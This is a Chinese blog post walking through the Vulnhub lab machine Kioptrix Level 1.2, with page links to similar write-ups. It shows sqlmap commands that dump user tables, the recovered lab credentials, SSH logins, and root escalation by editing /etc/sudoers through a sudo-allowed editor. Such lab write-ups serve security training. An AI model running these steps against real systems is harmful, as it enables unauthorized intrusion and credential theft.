Kioptrix : Level 1.2

最新推荐文章于 2024-10-13 17:16:36 发布
最新推荐文章于 2024-10-13 17:16:36 发布
阅读量289 收藏 5
点赞数 3
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78815619/article/details/142218636
版权

一,主机发现

二,信息收集

1.访问首页

将域名与ip做绑定

访问,发现有id参数

2.目录扫描

1)/modules

2)/phpmyadmin

3)发现cms

4)首页的登陆页面

三,利用

1.到kali找历史漏洞

searchsploit lotusCMS

直接sql注入

sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch

查询数据库信息

sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch --dbs			# 查询数据库名
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch -D gallery --tables			# 查询gallery库下数据表
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump		查询 user 表下用户
sqlmap -u "http://192.168.119.140/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --dump
 
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)

使用得到的密码尝试登录博客,登录失败

getshell

尝试另两组用户名密码,发现可通过 ssh 远程连接

ssh dreg@192.168.119.140

提示需要凭证

ssh -oHostKeyAlgorithms=+ssh-dss dreg@192.168.119.140
ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.119.140

四,提权

发现 loneferret 用户存在利用点

cat /etc/passwd

查看用户家目录

ls
cat CompanyPolicy.README

根据提示,执行命令

ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.119.140
 
find / -perm -u=s -type f 2>/dev/null
sudo -l
sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 export TERM=xterm
//ht编辑器修改/etc/sudoers:F3 --> 查找 /etc/sudoers --> 添加 /bin/bash --> F2 保存 --> F10 退出
 
sudo /bin/bash

提权成功

0Deww
关注
vulnhub靶场/Kioptrix Level-1.2
qq_45230030的博客
04-18 463
基本是按下载地址中的顺序打的,第二个下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。
Vulnhub靶机:Kioptrix_Level1.2
qq_48904485的博客
03-14 488
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
KIOPTRIX: LEVEL 1.2 (#3)
Katarina__的博客
09-04 670
KIOPTRIX: LEVEL 1.2 (#3) 攻击机IP:192.168.253.143 靶机IP:192.168.253.144 一、信息收集 1、确定目标主机IP、开放端口 使用netdiscover确定网段内目标主机。 netdiscover -i eth0 -r 192.168.253.0/24 (主动探测网段内活动主机) 也可使用nmap扫固定网段 nmap -sP 192.168.253.0/24 找到ip后,可继续使用nmap探测此主机的开放端口等信息 nmap -n -
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1106
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
[VulnHub靶机渗透] Kioptrix1.2
人若无名,便可专心练剑
03-22 1303
Kioptrix1.2这台靶机涉及LotusCMS公开漏洞利用,配置文件敏感信息枚举,mysql数据库信息搜集,使用john暴力破解md5哈希,使用ht编辑器修改sudoers文件提权等综合知识和技能。机器不难,攻击链很标准,是一台锻炼攻击思路的好靶机。
Vulnhub-靶机-Kioptrix: Level 1.2 (#3)
qq_43264813的博客
01-28 841
Vulnhub—靶机—Kioptrix: Level 1.2 (#3) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—Kioptrix: Level 1.2 (#3)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -n -sC -s
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
汗的博客
04-01 890
这次的靶机是Vulnhub靶机: 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 靶机设置 老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为 利用知识及工具 信息收集并getshell 提权 总结 ...
红队打靶:KIOPTRIX1.2打靶思路详解(vulnhub)
Bossfrank的博客
07-19 1371
本文是vulnhub靶机KIOPTRIX1.2的详细打靶过程。涉及到的知识点包括cms漏洞利用、敏感信息搜索、john破解密码哈希、sudoers文件提权等。CMS漏洞利用获得反弹shell是关键。敏感信息搜索需要有耐心。
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 417
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
Kali的基本扫描命令
weixin_43658613的博客
05-27 296
kali扫描,nmap
CTF之Kioptrix Level 1.2 靶机渗透(SQL注入 sudoers提权)
afei001
07-25 487
     练习环境     攻击机:kali     靶机:Kioptrix Level 1.2     下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 10.10.10.0/16 IP At MAC Address Count Len MAC Vendor / Hostname ---------.
Kioptrix: Level 1.1 (#2)
战神/calmness的博客
06-04 1097
下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 目标机器:192.168.243.147 攻击机器:192.168.210.134 目录 信息收集 万能和密码破解 命令执行 反弹shell 监听 提权 版本内核 linux 2.6.9 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (proto...
CTFHUB技能树之HTTP协议——响应包源代码
最新发布
weixin_73049307的博客
10-13 562
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
域1:安全与风险管理 第2章-人员安全与风险管理
rm -rf /*
10-12 1001
风险管理过程包括识别可能造成数据损坏或泄漏的因素,根据数据价值和控制措施的成本评估这些因素,并实施具有成本效益的解决方案来减轻或者降低风险。通过执行风险管理,为全面降低风险奠定基础。
Kioptrix Level 1.2 (#3)靶机攻破:信息收集与权限提升
"Kioptrix: Level 1.2 (#3) 是一款Vulnhub靶机,用于网络安全和渗透测试练习。靶机IP为192.168.190.189,需配置host指向kioptrix3.com。攻破靶机涉及信息收集、漏洞利用、GETShell以及提权等技能,主要工具包括dirb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值